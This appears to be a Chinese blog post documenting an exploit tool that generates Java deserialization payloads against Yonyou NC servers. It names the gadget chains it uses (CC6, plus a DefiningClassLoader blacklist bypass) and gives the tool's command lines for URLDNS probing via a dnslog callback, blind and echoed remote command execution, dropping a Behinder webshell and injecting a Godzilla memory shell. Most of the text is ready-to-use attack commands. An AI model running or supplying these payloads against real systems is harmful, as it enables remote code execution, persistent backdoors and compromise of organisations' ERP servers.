用友NC反序列化漏洞payload生成
- 前言
无回显的构造链直接使用的是
CC6
执行命令,回显的构造链使用了DefiningClassLoader
来绕过默认的黑名单,然后结合CC6
构造链进行任意代码执行。搭配了接口检测功能和
URLDNS
构造链判断是否存在反序列化。
- 接口检查功能:
java -jar nc6.5.jar http://127.0.0.1 Check
URLDNS
构造链探测:java -jar nc6.5.jar http://127.0.0.1 urldns http://123.dnslog.cn
- 无回显命令执行:
java -jar yonyouNCTools.jar http://192.168.222.130 blind calc.exe
- 回显命令执行:
java -jar yonyouNCTools.jar http://192.168.222.130 Execute
,通过Header
头传递命令。
- 落地
webshell
:java -jar yonyouNCTools.jar http://192.168.222.130 UploadShell "C:\Users\Administrator\Pictures\Camera Roll\1.jsp"
此处如果使用
java1.8
运行,固定落地一个天蝎的webshell
,路径为:http://127.0.0.1/eozZEwBb.jsp
,如果使用的是java1.7
运行,会重新动态编译,可以落地自定义的webshell
,路径随机。
通过
java1.7
落地自定义的webshell
,因为用到了动态编译,所有需要使用jre
下的java.exe
运行,否则动态编译失败。动态编译过程会提示使用了过时的API
,没有影响。
- 注入内存马:
java -jar yonyouNCTools.jar http://192.168.222.130 MemoryShell
,注入的是一个valve-Godzilla
内存马。
温馨提示:本文最后更新于2024年3月8日 01:40,若内容或图片失效,请在下方留言或联系博主。